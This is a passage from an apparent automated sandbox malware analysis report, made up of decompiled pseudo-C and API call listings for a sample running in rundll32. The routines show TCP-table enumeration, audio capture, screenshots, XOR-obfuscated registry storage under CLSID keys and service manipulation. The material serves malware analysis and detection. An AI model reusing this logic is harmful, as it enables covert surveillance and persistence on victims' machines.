                                                            					_a8 = _t22;
                                                            					if(_t22 == 0) {
                                                            						L10:
                                                            						return _t22;
                                                            					} else {
                                                            						_t10 = LocalSize(_t22) + 1; // 0x1
                                                            						_t43 = LocalAlloc(0x40, _t10);
                                                            						_t74 = _a8;
                                                            						_t12 = _t43 + 1; // 0x1
                                                            						_t52 = _t12;
                                                            						 *_t43 = 0x8e;
                                                            						E0465E060(_t52, _t74, _t30);
                                                            						LocalFree(_t74);
                                                            						_t34 = LocalSize(_t43);
                                                            						_push(_t52);
                                                            						_push(0x3f);
                                                            						_push(_t34);
                                                            						_push(_t43);
                                                            						E04631C60( *((intOrPtr*)(_v8 + 4)));
                                                            						return LocalFree(_t43);
                                                            					}
                                                            				}
                                                            			}


                                                            APIs
                                                            • Sleep.KERNEL32(00000064,?,?,?,?,?,0463D48F,?,?), ref: 0463DF4D
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DF72
                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,0463D48F,?,?), ref: 0463DF7C
                                                            • LocalFree.KERNEL32(?), ref: 0463DF9F
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DFA2
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0463DFB5
                                                              • Part of subcall function 0463DE60: GetTcpTable.IPHLPAPI(00000000,?,00000001), ref: 0463DE80
                                                              • Part of subcall function 0463DE60: GetTcpTable.IPHLPAPI(00000000,?,00000001), ref: 0463DE9B
                                                            • LocalSize.KERNEL32(00000000), ref: 0463DFD8
                                                            • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,0463D48F,?,?), ref: 0463DFE2
                                                            • LocalFree.KERNEL32(?), ref: 0463E005
                                                            • LocalSize.KERNEL32(00000000), ref: 0463E008
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0463E01B
                                                              • Part of subcall function 0463DB90: LocalAlloc.KERNEL32(00000040,74CF5A91,00000000,?,?), ref: 0463DBDE
                                                              • Part of subcall function 0463DB90: LocalFree.KERNEL32(?,?,?,?), ref: 0463DC00
                                                              • Part of subcall function 0463DB90: LocalFree.KERNEL32(?,?,?,?), ref: 0463DC1E
                                                              • Part of subcall function 0463DB90: LocalSize.KERNEL32(00000000), ref: 0463DC25
                                                              • Part of subcall function 0463DB90: LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 0463DC3C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Free$Size$Alloc$Table$Sleep
                                                            • String ID:
                                                            • API String ID: 1439515551-0
                                                            • Opcode ID: f277c148c2324bc9d7fddac8046e8855cf850c87abc526863153641e9ca8ece8
                                                            • Instruction ID: 09abd47c208c34102afb50fe517c98f2eb0c48e25c525eb38b930aceb4cc8be0
                                                            • Opcode Fuzzy Hash: f277c148c2324bc9d7fddac8046e8855cf850c87abc526863153641e9ca8ece8
                                                            • Instruction Fuzzy Hash: E631C976A00218ABD714AFA5EC84D6BB79DEF59221B044159FD09D7241EB36FD10CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E04631280(intOrPtr* __ecx) {
                                                            				void* _t38;
                                                            				void* _t39;
                                                            				void* _t40;
                                                            				intOrPtr* _t42;
                                                            				intOrPtr* _t43;
                                                            				struct wavehdr_tag** _t45;
                                                            				struct wavehdr_tag** _t46;
                                                            				void* _t47;
                                                            
                                                            				_t42 = __ecx;
                                                            				 *__ecx = 0x467c5cc;
                                                            				if( *((char*)(__ecx + 0x44)) != 0) {
                                                            					waveInStop( *(__ecx + 0x18));
                                                            					waveInReset( *(__ecx + 0x18));
                                                            					_t46 = __ecx + 0x30;
                                                            					_t40 = 2;
                                                            					do {
                                                            						waveInUnprepareHeader( *(__ecx + 0x18),  *_t46, 0x20);
                                                            						_t46 =  &(_t46[1]);
                                                            						_t40 = _t40 - 1;
                                                            					} while (_t40 != 0);
                                                            					waveInClose( *(__ecx + 0x18));
                                                            					TerminateThread( *(__ecx + 0x2c), 0xffffffff);
                                                            				}
                                                            				if( *((char*)(_t42 + 0x45)) != 0) {
                                                            					waveOutReset( *(_t42 + 0x40));
                                                            					_t45 = _t42 + 0x30;
                                                            					_t39 = 2;
                                                            					do {
                                                            						waveOutUnprepareHeader( *(_t42 + 0x40),  *_t45, 0x20);
                                                            						_t45 =  &(_t45[1]);
                                                            						_t39 = _t39 - 1;
                                                            					} while (_t39 != 0);
                                                            					waveOutClose( *(_t42 + 0x40));
                                                            				}
                                                            				_t43 = _t42 + 0x30;
                                                            				_t38 = 2;
                                                            				do {
                                                            					L04655B0F( *((intOrPtr*)(_t43 - 0x28)));
                                                            					_push(0x20);
                                                            					E04655B47( *_t43);
                                                            					L04655B0F( *((intOrPtr*)(_t43 - 0x20)));
                                                            					_push(0x20);
                                                            					E04655B47( *((intOrPtr*)(_t43 + 8)));
                                                            					_t47 = _t47 + 0x18;
                                                            					_t43 = _t43 + 4;
                                                            					_t38 = _t38 - 1;
                                                            				} while (_t38 != 0);
                                                            				CloseHandle( *(_t42 + 0x24));
                                                            				CloseHandle( *(_t42 + 0x28));
                                                            				return CloseHandle( *(_t42 + 0x2c));
                                                            			}


                                                            APIs
                                                            • waveInStop.WINMM(?), ref: 04631294
                                                            • waveInReset.WINMM(?), ref: 0463129D
                                                            • waveInUnprepareHeader.WINMM(?,?,00000020), ref: 046312B7
                                                            • waveInClose.WINMM(?), ref: 046312C8
                                                            • TerminateThread.KERNEL32(?,000000FF), ref: 046312D3
                                                            • waveOutReset.WINMM(?), ref: 046312E2
                                                            • waveOutUnprepareHeader.WINMM(?,?,00000020), ref: 046312F7
                                                            • waveOutClose.WINMM(?), ref: 04631308
                                                            • CloseHandle.KERNEL32(?), ref: 0463134D
                                                            • CloseHandle.KERNEL32(?), ref: 04631352
                                                            • CloseHandle.KERNEL32(?), ref: 04631357
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: wave$Close$Handle$HeaderResetUnprepare$StopTerminateThread
                                                            • String ID:
                                                            • API String ID: 1104916709-0
                                                            • Opcode ID: 675c0c1ecf982a7eec280db0c8ccdcb29834730b2d239f4a8cd6a738c3ca60ce
                                                            • Instruction ID: 19a8ddbfa863a4024333eb9fc8aa0a970693eaf6bbfce4611d15fe8070bfffa3
                                                            • Opcode Fuzzy Hash: 675c0c1ecf982a7eec280db0c8ccdcb29834730b2d239f4a8cd6a738c3ca60ce
                                                            • Instruction Fuzzy Hash: BE21E472600612FFEB265F65DD0CA48BF72FF09311F005124EA4562AB1EB26BC66DF80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 93%
                                                            			E0463E880(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				short _v1128;
                                                            				void* _v1132;
                                                            				char _v1136;
                                                            				int* _v1140;
                                                            				int _v1144;
                                                            				void* _v1148;
                                                            				int _v1152;
                                                            				int _v1156;
                                                            				void* __ebp;
                                                            				signed int _t49;
                                                            				int* _t57;
                                                            				void* _t72;
                                                            				void* _t74;
                                                            				void* _t75;
                                                            				int _t84;
                                                            				signed int* _t85;
                                                            				signed int* _t89;
                                                            				char _t93;
                                                            				int* _t95;
                                                            				char _t96;
                                                            				int* _t98;
                                                            				signed int* _t99;
                                                            				signed int _t101;
                                                            				void* _t102;
                                                            				void* _t103;
                                                            				void* _t104;
                                                            				signed int _t117;
                                                            
                                                            				_t49 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t49 ^ _t101;
                                                            				_t95 = 0;
                                                            				_t85 = L"Pg";
                                                            				_v1140 = 0;
                                                            				E04646050(__ebx, _t85,  &_v88, 0, __esi);
                                                            				wsprintfW( &_v1128, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_t103 = _t102 + 0xc;
                                                            				_t84 = 0;
                                                            				_t57 = RegOpenKeyExW(0x80000002,  &_v1128, 0, 0x20119,  &_v1132);
                                                            				if(_t57 == 0) {
                                                            					_v1144 = 0x104;
                                                            					if(RegEnumKeyExW(_v1132, 0,  &_v608,  &_v1144, _t57, _t57, _t57, _t57) == 0) {
                                                            						_push(__esi);
                                                            						do {
                                                            							_t84 = _t84 + 1;
                                                            							if(_v1144 == 0x10) {
                                                            								_v1152 = 4;
                                                            								_t98 = 0;
                                                            								_v1136 = 0;
                                                            								_v1148 = 0;
                                                            								if(RegOpenKeyExW(_v1132,  &_v608, 0, 0x20119,  &_v1148) != 0) {
                                                            									L8:
                                                            									_t96 = 1;
                                                            								} else {
                                                            									if(RegQueryValueExW(_v1148, "2", 0,  &_v1156,  &_v1136,  &_v1152) == 0) {
                                                            										_t98 =  ==  ? 1 : 0;
                                                            									}
                                                            									RegCloseKey(_v1148);
                                                            									_t96 = _v1136;
                                                            									if(_t98 == 0) {
                                                            										goto L8;
                                                            									}
                                                            								}
                                                            								_push(_t85);
                                                            								_v1136 = 0;
                                                            								_t85 = _v1132;
                                                            								_t99 = E04640C60(_t85,  &_v608, _t85,  &_v1136);
                                                            								_t103 = _t103 + 0xc;
                                                            								if(_t99 == 0) {
                                                            									_t95 = _v1140;
                                                            								} else {
                                                            									_t93 = _v1136;
                                                            									if(_t93 > 1) {
                                                            										_t31 = _t93 - 1; // -1
                                                            										_t74 = _t31;
                                                            										 *(_t74 + _t99) =  *(_t74 + _t99) ^  *_t99;
                                                            										_t75 = _t74 - 1;
                                                            										while(_t75 != 0) {
                                                            											 *(_t75 + _t99) =  *(_t75 + _t99) ^  *(_t75 +  &(_t99[0]));
                                                            											_t75 = _t75 - 1;
                                                            										}
                                                            										_t89 = _t75 + _t99;
                                                            										 *_t89 =  *_t89 ^ _t89[0];
                                                            										_t117 =  *_t89;
                                                            									}
                                                            									_t85 = _t99;
                                                            									_t72 = E0463F050(_t84, _t93, _t96, _t99, _t117, 1, _t96);
                                                            									_t95 = _v1140;
                                                            									_t104 = _t103 + 8;
                                                            									if(_t72 != 0) {
                                                            										_v1140 = _t95;
                                                            									}
                                                            									L04655B0F(_t99);
                                                            									_t103 = _t104 + 4;
                                                            								}
                                                            							}
                                                            							_v1144 = 0x104;
                                                            						} while (RegEnumKeyExW(_v1132, _t84,  &_v608,  &_v1144, 0, 0, 0, 0) == 0);
                                                            					}
                                                            					RegCloseKey(_v1132);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t101);
                                                            			}

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0463E8BA
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0463E8DE
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0463E90F
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020119,?,74CB43E0), ref: 0463E960
                                                            • RegQueryValueExW.ADVAPI32(?,0467E124,00000000,?,?,00000004), ref: 0463E98B
                                                            • RegCloseKey.ADVAPI32(?), ref: 0463E9AA
                                                            • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000010,00000000,00000000,00000000,00000000,74CB43E0), ref: 0463EA6E
                                                            • RegCloseKey.ADVAPI32(?), ref: 0463EA83
                                                            Strings
                                                            • SOFTWARE\Classes\CLSID\%s, xrefs: 0463E8B4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpen$EnumQueryValue$wsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 617139280-1183003970
                                                            • Opcode ID: 1df1529206a9745500ef68e32227d10afb57df82f4200a52d4c55618c22bbe59
                                                            • Instruction ID: b413d0b1382b1df492d15550214e36d01361446df70f40446d4f54afdf554ece
                                                            • Opcode Fuzzy Hash: 1df1529206a9745500ef68e32227d10afb57df82f4200a52d4c55618c22bbe59
                                                            • Instruction Fuzzy Hash: 375163B19041689FDB218F60DC44BAAB77CEF45305F1001D9EA49A7241FB76AE88CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E0463EAA0(void* __ebx, char* __ecx, int __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				char _v616;
                                                            				signed int _t34;
                                                            				int _t64;
                                                            				void* _t78;
                                                            				void* _t79;
                                                            				char* _t85;
                                                            				signed int _t86;
                                                            
                                                            				_t34 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t34 ^ _t86;
                                                            				_t64 = __edx;
                                                            				_t85 = __ecx;
                                                            				if(__edx >= 0x5c) {
                                                            					if(__edx !=  *((intOrPtr*)(__ecx + 0x1c)) + 0x5c +  *((intOrPtr*)(__ecx + 0x24)) +  *((intOrPtr*)(__ecx + 0x20))) {
                                                            						goto L1;
                                                            					} else {
                                                            						_push(__edi);
                                                            						E04646050(__edx, L"Pg",  &_v88, __edi, __ecx);
                                                            						wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s\\%s",  &_v88, __ecx + 0x28);
                                                            						E046454D0(_t85, _t64);
                                                            						_v616 = 1;
                                                            						_v612 = 0;
                                                            						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0x20106, 0,  &_v612, 0) == 0) {
                                                            							RegSetValueExW(_v612, "2", 0, 4,  &_v616, 4);
                                                            							RegCloseKey(_v612);
                                                            						}
                                                            						_v612 = 0;
                                                            						if(RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0x20106, 0,  &_v612, 0) == 0) {
                                                            							RegSetValueExW(_v612, "1", 0, 3, _t85, _t64);
                                                            							asm("sbb edi, edi");
                                                            							RegCloseKey(_v612);
                                                            						}
                                                            						if(_t64 > 1) {
                                                            							_t78 = _t64 - 1;
                                                            							 *(_t78 + _t85) =  *(_t78 + _t85) ^  *_t85;
                                                            							_t79 = _t78 - 1;
                                                            							while(_t79 != 0) {
                                                            								 *(_t79 + _t85) =  *(_t79 + _t85) ^  *(_t79 +  &(_t85[1]));
                                                            								_t79 = _t79 - 1;
                                                            							}
                                                            							 *(_t79 + _t85) =  *(_t79 + _t85) ^  *(_t79 +  &(_t85[1]));
                                                            						}
                                                            						return E04655AFE(_v8 ^ _t86);
                                                            					}
                                                            				} else {
                                                            					L1:
                                                            					return E04655AFE(_v8 ^ _t86);
                                                            				}
                                                            			}

                                                            APIs
                                                            • wsprintfW.USER32 ref: 0463EB04
                                                            • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 0463EB4C
                                                            • RegSetValueExW.ADVAPI32(00000000,0467E124,00000000,00000004,00000001,00000004), ref: 0463EB74
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463EB7C
                                                            • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00020106,00000000,00000000,00000000), ref: 0463EBAE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$CloseValuewsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s\%s$\
                                                            • API String ID: 1643814758-3376016971
                                                            • Opcode ID: 674bd381b84b7a30b50fa7ffe2177fb5829b69ee14cce6eaeb2f573acb53f48e
                                                            • Instruction ID: 965262c81fc00a7f2ce6cb3705c05acf8533ab49f00dfa97f0738d8780a6b2e4
                                                            • Opcode Fuzzy Hash: 674bd381b84b7a30b50fa7ffe2177fb5829b69ee14cce6eaeb2f573acb53f48e
                                                            • Instruction Fuzzy Hash: 0941F730644358ABEB31DF64DC89FAAB7B9FF44704F1000D9E506AA281FB72AD48CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 94%
                                                            			E0463E700(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v92;
                                                            				short _v612;
                                                            				short _v1132;
                                                            				int _v1136;
                                                            				void* _v1140;
                                                            				void* _v1144;
                                                            				char _v1148;
                                                            				signed int _t27;
                                                            				int* _t35;
                                                            				char _t54;
                                                            				int _t65;
                                                            				signed int _t66;
                                                            
                                                            				_t27 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t27 ^ _t66;
                                                            				_t54 = __ecx;
                                                            				E04646050(__ecx, L"Pg",  &_v92, __edi, __esi);
                                                            				wsprintfW( &_v1132, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v92);
                                                            				_t65 = 0;
                                                            				_t35 = RegOpenKeyExW(0x80000002,  &_v1132, 0, 0x20119,  &_v1140);
                                                            				if(_t35 != 0) {
                                                            					L8:
                                                            					if(_t54 == 0) {
                                                            						E0463E660();
                                                            						return E04655AFE(_v8 ^ _t66);
                                                            					} else {
                                                            						E0463E5F0();
                                                            						return E04655AFE(_v8 ^ _t66);
                                                            					}
                                                            				}
                                                            				_v1136 = 0x104;
                                                            				if(RegEnumKeyExW(_v1140, 0,  &_v612,  &_v1136, _t35, _t35, _t35, _t35) != 0) {
                                                            					L7:
                                                            					RegCloseKey(_v1140);
                                                            					goto L8;
                                                            				} else {
                                                            					do {
                                                            						_t65 = _t65 + 1;
                                                            						if(_v1136 == 0x10) {
                                                            							_v1148 = _t54;
                                                            							_v1144 = 0;
                                                            							if(RegCreateKeyExW(_v1140,  &_v612, 0, 0, 0, 0x20106, 0,  &_v1144, 0) == 0) {
                                                            								RegSetValueExW(_v1144, "2", 0, 4,  &_v1148, 4);
                                                            								RegCloseKey(_v1144);
                                                            							}
                                                            						}
                                                            						_v1136 = 0x104;
                                                            					} while (RegEnumKeyExW(_v1140, _t65,  &_v612,  &_v1136, 0, 0, 0, 0) == 0);
                                                            					goto L7;
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0463E735
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0463E759
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0463E78A
                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 0463E7DD
                                                            • RegSetValueExW.ADVAPI32(00000000,0467E124,00000000,00000004,?,00000004), ref: 0463E7FF
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463E80B
                                                            • RegEnumKeyExW.ADVAPI32(?,00000001,?,00000010,00000000,00000000,00000000,00000000), ref: 0463E834
                                                            • RegCloseKey.ADVAPI32(?), ref: 0463E848
                                                            Strings
                                                            • SOFTWARE\Classes\CLSID\%s, xrefs: 0463E72F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$EnumOpenValue$CreateQuerywsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 2517750250-1183003970
                                                            • Opcode ID: 2bb271f5db99af792f3c65c5c9eec21e2ebaabe66a7307eb982caa4084c27a09
                                                            • Instruction ID: 54f58713b4737784f6e58f61e052c967f5ed4bdb6d8b1388ea1aebcca8a4ee3c
                                                            • Opcode Fuzzy Hash: 2bb271f5db99af792f3c65c5c9eec21e2ebaabe66a7307eb982caa4084c27a09
                                                            • Instruction Fuzzy Hash: CF4166B1A44218ABEB209F60DC49FEAB77CEB45705F0001A9AB09E6181FB716E44CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E0464A9E0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				struct _SECURITY_ATTRIBUTES* _v612;
                                                            				signed int _t11;
                                                            				void* _t21;
                                                            				long _t26;
                                                            				struct _SECURITY_ATTRIBUTES* _t29;
                                                            				void* _t39;
                                                            				void* _t41;
                                                            				void* _t42;
                                                            				signed int _t44;
                                                            
                                                            				_t41 = __esi;
                                                            				_t11 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t11 ^ _t44;
                                                            				_v612 = 0;
                                                            				_t29 = E04649620(__ebx,  &_v612, __edi, __esi, __eflags);
                                                            				_v612 = _t29;
                                                            				if(_t29 == 0) {
                                                            					L11:
                                                            					return E04655AFE(_v8 ^ _t44);
                                                            				}
                                                            				_push(__edi);
                                                            				E04646050(_t29, L"rebootshutdown",  &_v88, __edi, __esi);
                                                            				wsprintfW( &_v608, L"Global\\%s",  &_v88);
                                                            				_t39 = CreateMutexW(0, 1,  &_v608);
                                                            				if(_t39 != 0) {
                                                            					_t26 = GetLastError();
                                                            					_t51 = _t26 - 0xb7;
                                                            					if(_t26 == 0xb7) {
                                                            						WaitForSingleObject(_t39, 0xffffffff);
                                                            					}
                                                            				}
                                                            				_push(_t41);
                                                            				_t42 = 0;
                                                            				_t21 = E0464A280(_t29, 0, _t39, 0, _t51);
                                                            				_t52 = _t21;
                                                            				if(_t21 != 0) {
                                                            					L8:
                                                            					if(_t39 != 0) {
                                                            						ReleaseMutex(_t39);
                                                            						CloseHandle(_t39);
                                                            					}
                                                            					L04655B0F(_t29);
                                                            					goto L11;
                                                            				} else {
                                                            					do {
                                                            						_t42 = _t42 + 1;
                                                            						Sleep(5);
                                                            					} while (E0464A280(Sleep, _t42, _t39, _t42, _t52) == 0);
                                                            					_t29 = _v612;
                                                            					goto L8;
                                                            				}
                                                            			}
                                                            0x0464a9e0
                                                            0x0464a9e9
                                                            0x0464a9f0
                                                            0x0464a9fa
                                                            0x0464aa09
                                                            0x0464aa0b
                                                            0x0464aa13
                                                            0x0464aab4
                                                            0x0464aac2
                                                            0x0464aac2
                                                            0x0464aa19
                                                            0x0464aa22
                                                            0x0464aa37
                                                            0x0464aa51
                                                            0x0464aa55
                                                            0x0464aa57
                                                            0x0464aa5d
                                                            0x0464aa62
                                                            0x0464aa67
                                                            0x0464aa67
                                                            0x0464aa62
                                                            0x0464aa6d
                                                            0x0464aa70
                                                            0x0464aa72
                                                            0x0464aa77
                                                            0x0464aa79
                                                            0x0464aa97
                                                            0x0464aa9a
                                                            0x0464aa9d
                                                            0x0464aaa4
                                                            0x0464aaa4
                                                            0x0464aaab
                                                            0x00000000
                                                            0x0464aa7b
                                                            0x0464aa81
                                                            0x0464aa83
                                                            0x0464aa84
                                                            0x0464aa8d
                                                            0x0464aa91
                                                            0x00000000
                                                            0x0464aa91

                                                            APIs
                                                              • Part of subcall function 04649620: wsprintfW.USER32 ref: 04649654
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0464AA37
                                                            • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 0464AA4B
                                                            • GetLastError.KERNEL32 ref: 0464AA57
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0464AA67
                                                            • Sleep.KERNEL32(00000005), ref: 0464AA84
                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0464AA9D
                                                            • CloseHandle.KERNEL32(00000000), ref: 0464AAA4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseMutexwsprintf$CreateErrorHandleLastObjectOpenQueryReleaseSingleSleepValueWait
                                                            • String ID: Global\%s$rebootshutdown
                                                            • API String ID: 2719347979-2939806910
                                                            • Opcode ID: 4bc7cc1db92f21df601545d8c06ccdae283451c565e119b574ca8f71c7e65966
                                                            • Instruction ID: f15a57469ba899a2f5c12999342ca149c9296b67132ada1c0782331663a23620
                                                            • Opcode Fuzzy Hash: 4bc7cc1db92f21df601545d8c06ccdae283451c565e119b574ca8f71c7e65966
                                                            • Instruction Fuzzy Hash: CF21EE71A44208ABDF10EFE4DD8CBAF7378EF94714F140158E90A96284FF39AD448B55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetWindowRect.USER32(00000000,?), ref: 046376E3
                                                            • CreateCompatibleDC.GDI32 ref: 046376EA
                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 04637723
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0463772E
                                                            • PrintWindow.USER32(00000000,00000000,00000000,?,?,?), ref: 04637745
                                                            • PrintWindow.USER32(00000000,00000000,00000002,?,?,?), ref: 0463774B
                                                            • PrintWindow.USER32(00000000,00000000,00000000,?,?,?), ref: 04637755
                                                            • BitBlt.GDI32(?,?,?,00000000,?,00000000,00000000,00000000,00CC0020), ref: 046377A2
                                                            • DeleteObject.GDI32(?), ref: 046377B2
                                                            • DeleteDC.GDI32(00000000), ref: 046377B9
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$Print$CompatibleCreateDeleteObject$BitmapRectSelect
                                                            • String ID:
                                                            • API String ID: 718922780-0
                                                            • Opcode ID: 31253f0945fe40197277f61d7b02bea19f6442204431b62344e670bd6d45231a
                                                            • Instruction ID: e42218a1efb574b9e87f967814a2e7a484dc2f59c4637dd1fd98cc4ed3474583
                                                            • Opcode Fuzzy Hash: 31253f0945fe40197277f61d7b02bea19f6442204431b62344e670bd6d45231a
                                                            • Instruction Fuzzy Hash: A5313BB1A10609EEDB11DBB8DC58AAEBBBCEF49351F109219F505F2255FB3498818A60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E04643970(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v32;
                                                            				struct _SERVICE_STATUS _v36;
                                                            				int _v40;
                                                            				signed int _t10;
                                                            				void* _t28;
                                                            				void* _t36;
                                                            				short* _t38;
                                                            				void* _t39;
                                                            				void* _t40;
                                                            				signed int _t41;
                                                            
                                                            				_t10 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t10 ^ _t41;
                                                            				_t38 = __ecx;
                                                            				_v40 = 0;
                                                            				_t28 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				if(_t28 == 0) {
                                                            					return E04655AFE(_v8 ^ _t41);
                                                            				} else {
                                                            					_t36 = OpenServiceW(_t28, _t38, 0xf01ff);
                                                            					if(_t36 != 0) {
                                                            						_t39 = 0;
                                                            						do {
                                                            							if(QueryServiceStatus(_t36,  &_v36) == 0) {
                                                            								goto L6;
                                                            							} else {
                                                            								if(_v32 == 1) {
                                                            									_t40 = LockServiceDatabase(_t28);
